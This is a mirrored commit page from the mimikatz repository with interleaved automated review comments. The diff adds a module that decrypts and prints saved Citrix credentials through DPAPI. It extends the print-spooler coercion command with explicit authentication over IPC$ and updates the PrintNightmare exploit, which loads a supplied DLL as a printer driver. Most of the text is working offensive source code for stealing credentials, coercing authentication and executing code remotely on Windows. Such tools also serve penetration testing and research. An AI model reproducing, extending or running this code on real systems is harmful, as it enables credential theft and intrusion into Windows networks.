mirror of
https://github.com/gentilkiwi/mimikatz
synced 2025-03-18 08:31:40 +00:00
Merge branch 'gentilkiwi:master' into master
commit
a952a601b5
@ -118,7 +118,7 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
|
||||
#define KULL_M_WIN_BUILD_10_1909 18363
|
||||
#define KULL_M_WIN_BUILD_10_2004 19041
|
||||
#define KULL_M_WIN_BUILD_10_20H2 19042
|
||||
|
||||
#define KULL_M_WIN_BUILD_2022 20348
|
||||
|
||||
#define KULL_M_WIN_MIN_BUILD_XP 2500
|
||||
#define KULL_M_WIN_MIN_BUILD_2K3 3000
|
||||
@ -126,4 +126,5 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
|
||||
#define KULL_M_WIN_MIN_BUILD_7 7000
|
||||
#define KULL_M_WIN_MIN_BUILD_8 8000
|
||||
#define KULL_M_WIN_MIN_BUILD_BLUE 9400
|
||||
#define KULL_M_WIN_MIN_BUILD_10 9800
|
||||
#define KULL_M_WIN_MIN_BUILD_10 9800
|
||||
#define KULL_M_WIN_MIN_BUILD_11 22000
|
@ -173,6 +173,7 @@
|
||||
<ClCompile Include="modules\dpapi\kuhl_m_dpapi.c" />
|
||||
<ClCompile Include="modules\dpapi\kuhl_m_dpapi_oe.c" />
|
||||
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_chrome.c" />
|
||||
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.c" />
|
||||
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_cloudap.c" />
|
||||
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_creds.c" />
|
||||
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_keys.c" />
|
||||
@ -289,6 +290,7 @@
|
||||
<ClInclude Include="modules\dpapi\kuhl_m_dpapi.h" />
|
||||
<ClInclude Include="modules\dpapi\kuhl_m_dpapi_oe.h" />
|
||||
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_chrome.h" />
|
||||
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.h" />
|
||||
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_cloudap.h" />
|
||||
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_creds.h" />
|
||||
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_keys.h" />
|
||||
|
@ -329,6 +329,9 @@
|
||||
<ClCompile Include="..\modules\rpc\kull_m_rpc_ms-efsr_c.c">
|
||||
<Filter>common modules\rpc</Filter>
|
||||
</ClCompile>
|
||||
<ClCompile Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.c">
|
||||
<Filter>local modules\dpapi\packages</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClInclude Include="mimikatz.h" />
|
||||
@ -677,6 +680,9 @@
|
||||
<ClInclude Include="..\modules\rpc\kull_m_rpc_ms-efsr.h">
|
||||
<Filter>common modules\rpc</Filter>
|
||||
</ClInclude>
|
||||
<ClInclude Include="modules\dpapi\packages\kuhl_m_dpapi_citrix.h">
|
||||
<Filter>local modules\dpapi\packages</Filter>
|
||||
</ClInclude>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<Filter Include="local modules">
|
||||
|
@ -27,6 +27,7 @@ const KUHL_M_C kuhl_m_c_dpapi[] = {
|
||||
{kuhl_m_dpapi_cloudap_keyvalue_derived, L"cloudapkd", L""},
|
||||
{kuhl_m_dpapi_cloudap_fromreg, L"cloudapreg", L""},
|
||||
{kuhl_m_dpapi_sccm_networkaccessaccount, L"sccm", L""},
|
||||
{kuhl_m_dpapi_citrix, L"citrix", L""},
|
||||
{kuhl_m_dpapi_oe_cache, L"cache", NULL},
|
||||
};
|
||||
const KUHL_M kuhl_m_dpapi = {
|
||||
|
@ -20,6 +20,7 @@
|
||||
#include "packages/kuhl_m_dpapi_lunahsm.h"
|
||||
#include "packages/kuhl_m_dpapi_cloudap.h"
|
||||
#include "packages/kuhl_m_dpapi_sccm.h"
|
||||
#include "packages/kuhl_m_dpapi_citrix.h"
|
||||
|
||||
const KUHL_M kuhl_m_dpapi;
|
||||
|
||||
|
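--- /dev/null
+++ b/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.c
@@ -0,0 +1,89 @@
+/* Benjamin DELPY `gentilkiwi`
+https://blog.gentilkiwi.com
+benjamin@gentilkiwi.com
+Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include "kuhl_m_dpapi_citrix.h"
+
+const char CITRIX_SAVED_CREDENTIALS_GUID[] = "{921BB3E1-15EE-4bbe-83D4-C4CE176A481B}";
+NTSTATUS kuhl_m_dpapi_citrix(int argc, wchar_t * argv[])
+{
+PKULL_M_REGISTRY_HANDLE hRegistry;
+PBYTE pbData;
+DWORD cbData;
+LPCWSTR szData;
+LPWSTR szGuid = NULL, szUrl, szBase64, szSavedCreds;
+LPSTR sEntropy;
+IXMLDOMDocument *pXMLDom;
+IXMLDOMNode *pNode;
+LPVOID pDataOut;
+DWORD dwDataOutLen;
+
+if(kull_m_string_args_byName(argc, argv, L"guid", &szData, NULL))
+{
+kull_m_string_copy(&szGuid, szData);
+}
+else if(kull_m_registry_open(KULL_M_REGISTRY_TYPE_OWN, NULL, FALSE, &hRegistry)) // todo: offline
+{
+//For v3, KEY_WOW64_32KEY
+kull_m_registry_OpenAndQueryWithAlloc(hRegistry, HKEY_LOCAL_MACHINE, L"SOFTWARE\\"
+#if defined(_M_X64) || defined(_M_ARM64) // TODO:ARM64
+L"WOW6432Node\\"
+#endif
+L"Citrix\\AuthManager", L"Guid", NULL, (LPVOID *) &szGuid, NULL);
+kull_m_registry_close(hRegistry);
+}
+
+if(szGuid)
+{
+kprintf(L"Citrix instance GUID : %s\n", szGuid);
+
+if(kull_m_string_args_byName(argc, argv, L"in", &szData, NULL))
+{
+kprintf(L"Using saved data from: %s\n", szData);
+if(pXMLDom = kull_m_xml_CreateAndInitDOM())
+{
+if(kull_m_xml_LoadXMLFile(pXMLDom, szData))
+{
+if((IXMLDOMDocument_selectSingleNode(pXMLDom, (BSTR) L"//Data/Item", &pNode) == S_OK) && pNode)
+{
+szUrl = kull_m_xml_getAttribute(pNode, L"url");
+if(szUrl)
+{
+kprintf(L"URL: %s\n", szUrl);
+kull_m_string_sprintfA(&sEntropy, "%S%s%S", szUrl, CITRIX_SAVED_CREDENTIALS_GUID, szGuid);
+if(sEntropy)
+{
+if(IXMLDOMNode_get_text(pNode, &szBase64) == S_OK)
+{
+if(kull_m_string_quick_base64_to_Binary(szBase64, &pbData, &cbData))
+{
+if(kuhl_m_dpapi_unprotect_raw_or_blob(pbData, cbData, NULL, argc, argv, sEntropy, lstrlenA(sEntropy), &pDataOut, &dwDataOutLen, NULL))
+{
+if(kull_m_string_copy_len(&szSavedCreds, (LPCWSTR) pDataOut, dwDataOutLen / sizeof(wchar_t)))
+{
+UrlUnescapeInPlace(szSavedCreds, 0);
+kprintf(L" > Saved data: %s\n", szSavedCreds);
+LocalFree(szSavedCreds);
+}
+LocalFree(pDataOut);
+}
+}
+SysFreeString(szBase64);
+}
+LocalFree(sEntropy);
+}
+LocalFree(szUrl);
+}
+}
+}
+kull_m_xml_ReleaseDom(pXMLDom);
+}
+}
+else PRINT_ERROR(L"Input Citrix saved data needed (/in:%%localappdata%%\\Citrix\\AuthManager\\Data\\<file.dat>)\n");
+LocalFree(szGuid);
+}
+else PRINT_ERROR(L"No instance GUID ? (use /guid:xxx (without {} to specify\n");
+
+return STATUS_SUCCESS;
+}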
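Review bot: The decoded buffer `pbData` is never released in kuhl_m_dpapi_citrix: the block guarded by `kull_m_string_quick_base64_to_Binary(szBase64, &pbData, &cbData)` closes without a matching free, while every other allocation in the function is paired with `LocalFree` or `SysFreeString`. Assuming that helper allocates with LocalAlloc like its siblings (its body is not on this page), add `LocalFree(pbData);` just before that block's closing brace. The `pNode` obtained from `IXMLDOMDocument_selectSingleNode` is likewise never released; an `IXMLDOMNode_Release(pNode);` at the end of the `if(... && pNode)` block would balance it. The usage message `(use /guid:xxx (without {} to specify` also leaves a parenthesis unclosed.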
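--- /dev/null
+++ b/mimikatz/modules/dpapi/packages/kuhl_m_dpapi_citrix.h
@@ -0,0 +1,9 @@
+/* Benjamin DELPY `gentilkiwi`
+https://blog.gentilkiwi.com
+benjamin@gentilkiwi.com
+Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#pragma once
+#include "../kuhl_m_dpapi.h"
+
+NTSTATUS kuhl_m_dpapi_citrix(int argc, wchar_t * argv[]);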
@ -1342,58 +1342,127 @@ handle_t __RPC_USER STRING_HANDLE_bind(IN STRING_HANDLE Name) {return hSpoolHand
|
||||
void __RPC_USER STRING_HANDLE_unbind(IN STRING_HANDLE Name, handle_t hSpool) {}
|
||||
NTSTATUS kuhl_m_misc_spooler(int argc, wchar_t * argv[])
|
||||
{
|
||||
LPCWSTR szRemote, szCallbackTo;
|
||||
LPWSTR szPathToCallback = NULL;
|
||||
NTSTATUS status;
|
||||
PRINTER_HANDLE hPrinter;
|
||||
DEVMODE_CONTAINER Container = {0, NULL};
|
||||
DWORD ret;
|
||||
DWORD dwRet, AuthnSvc;
|
||||
long ret = 0;
|
||||
NETRESOURCE nr = {0, RESOURCETYPE_DISK, 0, 0, NULL, NULL, NULL, NULL};
|
||||
LPCWSTR szUser, szPassword, szRemote = NULL, szEndpoint, szCallbackTo;
|
||||
PWSTR szPathToCallback;
|
||||
|
||||
SEC_WINNT_AUTH_IDENTITY secIdentity = {NULL, 0, NULL, 0, NULL, 0, SEC_WINNT_AUTH_IDENTITY_UNICODE};
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"authuser", &szUser, NULL))
|
||||
{
|
||||
AuthnSvc = RPC_C_AUTHN_GSS_NEGOTIATE;
|
||||
kprintf(L"[auth ] Explicit authentication\n");
|
||||
kprintf(L"[auth ] Username: %s\n", szUser);
|
||||
secIdentity.User = (USHORT *) szUser;
|
||||
secIdentity.UserLength = lstrlen(szUser);
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"authpassword", &szPassword, NULL))
|
||||
{
|
||||
kprintf(L"[auth ] Password: %s\n", szPassword);
|
||||
secIdentity.Password = (USHORT *) szPassword;
|
||||
secIdentity.PasswordLength = lstrlen(szPassword);
|
||||
}
|
||||
}
|
||||
else if(kull_m_string_args_byName(argc, argv, L"noauth", NULL, NULL))
|
||||
{
|
||||
AuthnSvc = RPC_C_AUTHN_NONE;
|
||||
kprintf(L"[auth ] None\n");
|
||||
szUser = szPassword = L"";
|
||||
}
|
||||
else
|
||||
{
|
||||
AuthnSvc = RPC_C_AUTHN_DEFAULT;
|
||||
kprintf(L"[auth ] Default (current)\n");
|
||||
szUser = szPassword = NULL;
|
||||
}
|
||||
|
||||
kull_m_string_args_byName(argc, argv, L"endpoint", &szEndpoint, L"\\pipe\\spoolss");
|
||||
kprintf(L"[ rpc ] Endpoint: %s\n", szEndpoint);
|
||||
|
||||
if(kull_m_string_args_byName(argc, argv, L"server", &szRemote, NULL) || kull_m_string_args_byName(argc, argv, L"target", &szRemote, NULL))
|
||||
{
|
||||
if(kull_m_string_args_byName(argc, argv, L"connect", &szCallbackTo, NULL) || kull_m_string_args_byName(argc, argv, L"callback", &szCallbackTo, NULL))
|
||||
{
|
||||
if(kull_m_string_sprintf(&szPathToCallback, L"\\\\%s", szCallbackTo))
|
||||
if(kull_m_string_sprintf(&nr.lpRemoteName, L"\\\\%s\\IPC$", szRemote))
|
||||
{
|
||||
kprintf(L"[info] %s will try to connect to %s\\IPC$\n\n", szRemote, szPathToCallback);
|
||||
if(kull_m_rpc_createBinding(NULL, L"ncacn_np", szRemote, L"\\pipe\\spoolss", L"spooler", TRUE, RPC_C_AUTHN_DEFAULT, NULL, RPC_C_IMP_LEVEL_DEFAULT, &hSpoolHandle, NULL))
|
||||
if(kull_m_string_sprintf(&szPathToCallback, L"\\\\%s", szCallbackTo))
|
||||
{
|
||||
RpcTryExcept
|
||||
kprintf(L"[trans] Disconnect eventual IPC: ");
|
||||
dwRet = WNetCancelConnection2(nr.lpRemoteName, 0, TRUE);
|
||||
if((dwRet == NO_ERROR) || (dwRet == ERROR_NOT_CONNECTED))
|
||||
{
|
||||
ret = RpcOpenPrinter(NULL, &hPrinter, NULL, &Container, GENERIC_READ);
|
||||
if(ret == ERROR_SUCCESS)
|
||||
kprintf(L"OK\n[trans] Connect to IPC: ");
|
||||
dwRet = WNetAddConnection2(&nr, szPassword, szUser, CONNECT_TEMPORARY);
|
||||
if(dwRet == NO_ERROR)
|
||||
{
|
||||
ret = RpcRemoteFindFirstPrinterChangeNotification(hPrinter, PRINTER_CHANGE_ALL, PRINTER_NOTIFY_CATEGORY_ALL, szPathToCallback, 42, 0, NULL);
|
||||
if(ret == ERROR_SUCCESS)
|
||||
kprintf(L"OK\n");
|
||||
if(kull_m_rpc_createBinding(NULL, L"ncacn_np", szRemote, szEndpoint, L"spooler", TRUE, AuthnSvc, secIdentity.UserLength ? &secIdentity : NULL, RPC_C_IMP_LEVEL_DEFAULT, &hSpoolHandle, NULL))
|
||||
{
|
||||
kprintf(L"Connected to the target, and notification is OK (?!)\n");
|
||||
ret = RpcFindClosePrinterChangeNotification(hPrinter);
|
||||
if(ret != ERROR_SUCCESS)
|
||||
kprintf(L"[ rpc ] Resolve Endpoint: ");
|
||||
status = RpcEpResolveBinding(hSpoolHandle, &winspool_v1_0_c_ifspec);
|
||||
if(status == RPC_S_OK)
|
||||
{
|
||||
PRINT_ERROR(L"RpcFindClosePrinterChangeNotification: 0x%08x\n", ret);
|
||||
kprintf(L"OK\n\n");
|
||||
RpcTryExcept
|
||||
{
|
||||
ret = RpcOpenPrinter(NULL, &hPrinter, NULL, &Container, GENERIC_READ);
|
||||
if(ret == ERROR_SUCCESS)
|
||||
{
|
||||
ret = RpcRemoteFindFirstPrinterChangeNotification(hPrinter, PRINTER_CHANGE_ALL, PRINTER_NOTIFY_CATEGORY_ALL, szPathToCallback, 42, 0, NULL);
|
||||
if(ret == ERROR_SUCCESS)
|
||||
{
|
||||
kprintf(L"Connected to the target, and notification is OK (?!)\n");
|
||||
ret = RpcFindClosePrinterChangeNotification(hPrinter);
|
||||
if(ret != ERROR_SUCCESS)
|
||||
{
|
||||
PRINT_ERROR(L"RpcFindClosePrinterChangeNotification: 0x%08x\n", ret);
|
||||
}
|
||||
}
|
||||
else if(ret == ERROR_ACCESS_DENIED)
|
||||
{
|
||||
kprintf(L"Access is denied (can be OK)\n");
|
||||
}
|
||||
else PRINT_ERROR(L"RpcRemoteFindFirstPrinterChangeNotification: 0x%08x\n", ret);
|
||||
|
||||
ret = RpcClosePrinter(&hPrinter);
|
||||
if(ret != ERROR_SUCCESS)
|
||||
{
|
||||
PRINT_ERROR(L"RpcClosePrinter: 0x%08x\n", ret);
|
||||
}
|
||||
}
|
||||
else PRINT_ERROR(L"RpcOpenPrinter: 0x%08x\n", ret);
|
||||
}
|
||||
RpcExcept(RPC_EXCEPTION)
|
||||
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
|
||||
RpcEndExcept
|
||||
|
||||
kprintf(L"\n");
|
||||
}
|
||||
else PRINT_ERROR(L"RpcEpResolveBinding: 0x%08x\n", status);
|
||||
|
||||
kull_m_rpc_deleteBinding(&hSpoolHandle);
|
||||
}
|
||||
else if(ret == ERROR_ACCESS_DENIED)
|
||||
{
|
||||
kprintf(L"Access is denied (can be OK)\n");
|
||||
}
|
||||
else PRINT_ERROR(L"RpcRemoteFindFirstPrinterChangeNotification: 0x%08x\n", ret);
|
||||
|
||||
ret = RpcClosePrinter(&hPrinter);
|
||||
if(ret != ERROR_SUCCESS)
|
||||
kprintf(L"[trans] Disconnect IPC: ");
|
||||
dwRet = WNetCancelConnection2(nr.lpRemoteName, 0, TRUE);
|
||||
if(dwRet == NO_ERROR)
|
||||
{
|
||||
PRINT_ERROR(L"RpcClosePrinter: 0x%08x\n", ret);
|
||||
kprintf(L"OK\n");
|
||||
}
|
||||
else PRINT_ERROR(L"WNetCancelConnection2: 0x%08x\n");
|
||||
}
|
||||
else PRINT_ERROR(L"RpcOpenPrinter: 0x%08x\n", ret);
|
||||
else PRINT_ERROR(L"WNetAddConnection2:%u\n", dwRet);
|
||||
}
|
||||
RpcExcept(RPC_EXCEPTION)
|
||||
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
|
||||
RpcEndExcept
|
||||
else PRINT_ERROR(L"WNetCancelConnection2: %u\n", dwRet);
|
||||
|
||||
kull_m_rpc_deleteBinding(&hSpoolHandle);
|
||||
LocalFree(szPathToCallback);
|
||||
}
|
||||
|
||||
LocalFree(szPathToCallback);
|
||||
LocalFree(nr.lpRemoteName);
|
||||
}
|
||||
}
|
||||
else PRINT_ERROR(L"missing /connect argument to specify notifications target");
|
||||
@ -1482,11 +1551,11 @@ NTSTATUS kuhl_m_misc_efs(int argc, wchar_t * argv[])
|
||||
else if(ret == 0)
|
||||
{
|
||||
PRINT_ERROR(L"EfsRpcOpenFileRaw is a success, really? (not normal)\n");
|
||||
EfsRpcCloseRaw(&hEfsHandle);
|
||||
EfsRpcCloseRaw(&hImportCtx);
|
||||
}
|
||||
else
|
||||
{
|
||||
PRINT_ERROR(L"EfsRpcOpenFileRaw: ", ret);
|
||||
PRINT_ERROR(L"EfsRpcOpenFileRaw: %u\n", ret);
|
||||
}
|
||||
}
|
||||
RpcExcept(RPC_EXCEPTION)
|
||||
@ -1589,7 +1658,7 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
|
||||
DriverInfo.pEnvironment = bIsX64 ? L"Windows x64" : L"Windows NT x86";
|
||||
if(kull_m_string_args_byName(argc, argv, L"library", &szLibrary, NULL))
|
||||
{
|
||||
if(kuhl_m_misc_printnightmare_normalize_library(szLibrary, &DriverInfo.pConfigFile, NULL))
|
||||
if(kuhl_m_misc_printnightmare_normalize_library(bIsPar, szLibrary, &DriverInfo.pConfigFile, NULL))
|
||||
{
|
||||
szForce = kull_m_string_args_byName(argc, argv, L"useown", NULL, NULL) ? DriverInfo.pConfigFile : NULL;
|
||||
|
||||
@ -1600,7 +1669,13 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
|
||||
{
|
||||
if(kuhl_m_misc_printnightmare_FillStructure(&DriverInfo, bIsX64, !kull_m_string_args_byName(argc, argv, L"nodynamic", NULL, NULL), szForce, bIsPar, hSpoolHandle))
|
||||
{
|
||||
kuhl_m_misc_printnightmare_AddPrinterDriver(bIsPar, hSpoolHandle, &DriverInfo, APD_COPY_FROM_DIRECTORY | APD_COPY_NEW_FILES | APD_INSTALL_WARNED_DRIVER);
|
||||
if(kuhl_m_misc_printnightmare_AddPrinterDriver(bIsPar, hSpoolHandle, &DriverInfo, APD_COPY_FROM_DIRECTORY | APD_COPY_NEW_FILES | APD_INSTALL_WARNED_DRIVER))
|
||||
{
|
||||
if(!bIsPar) // we can't remotely with normal user, use /clean with > rights
|
||||
{
|
||||
kuhl_m_misc_printnightmare_DeletePrinterDriver(bIsPar, hSpoolHandle, DriverInfo.pEnvironment, DriverInfo.pName);
|
||||
}
|
||||
}
|
||||
|
||||
LocalFree(DriverInfo.pDataFile);
|
||||
LocalFree(DriverInfo.pDriverPath);
|
||||
@ -1624,7 +1699,7 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[])
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary)
|
||||
BOOL kuhl_m_misc_printnightmare_normalize_library(BOOL bIsPar, LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
LPCWSTR szPtr;
|
||||
@ -1641,7 +1716,14 @@ BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *psz
|
||||
}
|
||||
else
|
||||
{
|
||||
status = kull_m_string_copy(pszNormalizedLibrary, szLibrary);
|
||||
if(!bIsPar)
|
||||
{
|
||||
status = kull_m_file_getAbsolutePathOf(szLibrary, pszNormalizedLibrary);
|
||||
}
|
||||
else
|
||||
{
|
||||
status = kull_m_string_copy(pszNormalizedLibrary, szLibrary);
|
||||
}
|
||||
}
|
||||
|
||||
if(status)
|
||||
@ -1742,7 +1824,7 @@ BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64
|
||||
|
||||
void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete)
|
||||
{
|
||||
DWORD i, ret, cReturned = 0;
|
||||
DWORD i, cReturned = 0;
|
||||
_PDRIVER_INFO_2 pDriverInfo;
|
||||
PWSTR pName, pConfig;
|
||||
|
||||
@ -1759,28 +1841,7 @@ void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t
|
||||
{
|
||||
if(pName == wcsstr(pName, MIMIKATZ L"-"))
|
||||
{
|
||||
RpcTryExcept
|
||||
{
|
||||
if(bIsPar)
|
||||
{
|
||||
kprintf(L"> RpcAsyncDeletePrinterDriverEx: ");
|
||||
ret = RpcAsyncDeletePrinterDriverEx(hRemoteBinding, NULL, (wchar_t *) szEnvironment, pName, DPD_DELETE_UNUSED_FILES, 0);
|
||||
}
|
||||
else
|
||||
{
|
||||
kprintf(L"> RpcDeletePrinterDriverEx: ");
|
||||
ret = RpcDeletePrinterDriverEx(NULL, (wchar_t *) szEnvironment, pName, DPD_DELETE_UNUSED_FILES, 0);
|
||||
}
|
||||
|
||||
if (ret == ERROR_SUCCESS)
|
||||
{
|
||||
kprintf(L"OK!\n");
|
||||
}
|
||||
else PRINT_ERROR(L"%u\n", ret);
|
||||
}
|
||||
RpcExcept(RPC_EXCEPTION)
|
||||
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
|
||||
RpcEndExcept
|
||||
kuhl_m_misc_printnightmare_DeletePrinterDriver(bIsPar, hRemoteBinding, szEnvironment, pName);
|
||||
}
|
||||
}
|
||||
}
|
||||
@ -1789,8 +1850,9 @@ void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t
|
||||
}
|
||||
}
|
||||
|
||||
void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags)
|
||||
BOOL kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
DWORD ret;
|
||||
DRIVER_CONTAINER container_info;
|
||||
|
||||
@ -1813,6 +1875,7 @@ void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBi
|
||||
|
||||
if (ret == ERROR_SUCCESS)
|
||||
{
|
||||
status = TRUE;
|
||||
kprintf(L"OK!\n");
|
||||
}
|
||||
else PRINT_ERROR(L"%u\n", ret);
|
||||
@ -1820,6 +1883,40 @@ void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBi
|
||||
RpcExcept(RPC_EXCEPTION)
|
||||
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
|
||||
RpcEndExcept
|
||||
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL kuhl_m_misc_printnightmare_DeletePrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, LPCWSTR pName)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
DWORD ret;
|
||||
|
||||
RpcTryExcept
|
||||
{
|
||||
if(bIsPar)
|
||||
{
|
||||
kprintf(L"> RpcAsyncDeletePrinterDriverEx: ");
|
||||
ret = RpcAsyncDeletePrinterDriverEx(hRemoteBinding, NULL, (wchar_t *) szEnvironment, (wchar_t *) pName, DPD_DELETE_UNUSED_FILES, 0);
|
||||
}
|
||||
else
|
||||
{
|
||||
kprintf(L"> RpcDeletePrinterDriverEx: ");
|
||||
ret = RpcDeletePrinterDriverEx(NULL, (wchar_t *) szEnvironment, (wchar_t *)pName, DPD_DELETE_UNUSED_FILES, 0);
|
||||
}
|
||||
|
||||
if (ret == ERROR_SUCCESS)
|
||||
{
|
||||
status = TRUE;
|
||||
kprintf(L"OK!\n");
|
||||
}
|
||||
else PRINT_ERROR(L"%u\n", ret);
|
||||
}
|
||||
RpcExcept(RPC_EXCEPTION)
|
||||
PRINT_ERROR(L"RPC Exception: 0x%08x (%u)\n", RpcExceptionCode(), RpcExceptionCode());
|
||||
RpcEndExcept
|
||||
|
||||
return status;
|
||||
}
|
||||
|
||||
BOOL kuhl_m_misc_printnightmare_EnumPrinters(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned)
|
||||
|
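Review bot: In kuhl_m_misc_spooler the error branch `else PRINT_ERROR(L"WNetCancelConnection2: 0x%08x\n");` after the "[trans] Disconnect IPC" step supplies no argument for `%08x`, so it prints an indeterminate value; it should read `else PRINT_ERROR(L"WNetCancelConnection2: 0x%08x\n", dwRet);` (the page has lost its +/- markers, but the WNet calls appear only in the new code). The added `kprintf(L"[auth ] Password: %s\n", szPassword);` echoes the supplied password in clear to the console and to anything capturing that output, which is worth dropping or masking. `szPassword` also looks uninitialised when `authuser` is given without `authpassword` and is then passed to `WNetAddConnection2`; initialising it to NULL at its declaration would make that path defined, assuming kull_m_string_args_byName leaves the output untouched on a miss. The function's end lies outside the hunk.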
@ -51,10 +51,11 @@ NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]);
|
||||
NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[]);
|
||||
|
||||
BOOL kuhl_m_misc_printnightmare_normalize_library(LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
|
||||
BOOL kuhl_m_misc_printnightmare_normalize_library(BOOL bIsPar, LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
|
||||
BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64, BOOL bIsDynamic, LPCWSTR szForce, BOOL bIsPar, handle_t hRemoteBinding);
|
||||
void kuhl_m_misc_printnightmare_ListPrintersAndMaybeDelete(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, BOOL bIsDelete);
|
||||
void kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags);
|
||||
BOOL kuhl_m_misc_printnightmare_AddPrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, PDRIVER_INFO_2 pInfo2, DWORD dwFlags);
|
||||
BOOL kuhl_m_misc_printnightmare_DeletePrinterDriver(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, LPCWSTR pName);
|
||||
BOOL kuhl_m_misc_printnightmare_EnumPrinters(BOOL bIsPar, handle_t hRemoteBinding, LPCWSTR szEnvironment, _PDRIVER_INFO_2 *ppDriverInfo, DWORD *pcReturned);
|
||||
|
||||
BOOL CALLBACK kuhl_m_misc_detours_callback_process(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg);
|
||||
|
@ -645,7 +645,7 @@ NTSTATUS kuhl_m_net_trust(int argc, wchar_t * argv[])
|
||||
else PRINT_ERROR(L"DsEnumerateDomainTrusts: %u\n", ret);
|
||||
|
||||
kprintf(L"\n\nLDAP mode: ");
|
||||
if(kull_m_ldap_getLdapAndRootDN(server, L"defaultNamingContext", &ld, &dn))
|
||||
if(kull_m_ldap_getLdapAndRootDN(server, L"defaultNamingContext", &ld, &dn, NULL))
|
||||
{
|
||||
if(kull_m_string_sprintf(&sysDN, L"CN=System,%s", dn))
|
||||
{
|
||||
@ -761,7 +761,7 @@ L")";
|
||||
BOOL isCheckDNS = kull_m_string_args_byName(argc, argv, L"dns", NULL, NULL);
|
||||
kull_m_string_args_byName(argc, argv, L"server", &server, NULL);
|
||||
|
||||
if(kull_m_ldap_getLdapAndRootDN(server, NULL, &ld, &dn))
|
||||
if(kull_m_ldap_getLdapAndRootDN(server, NULL, &ld, &dn, NULL))
|
||||
{
|
||||
dwRet = ldap_search_s(ld, dn, LDAP_SCOPE_SUBTREE, filter, myAttrs, FALSE, &pMessage);
|
||||
if(dwRet == LDAP_SUCCESS)
|
||||
|
@ -317,7 +317,7 @@ BOOL kuhl_m_sid_quickSearch(int argc, wchar_t * argv[], BOOL needUnique, PCWCHAR
|
||||
PWCHAR myAttrs[] = {L"name", L"sAMAccountName", L"objectSid", L"sIDHistory", L"objectGUID", NULL}, dn, filter;
|
||||
if(filter = kuhl_m_sid_filterFromArgs(argc, argv))
|
||||
{
|
||||
if(kull_m_ldap_getLdapAndRootDN(system, NULL, ld, &dn))
|
||||
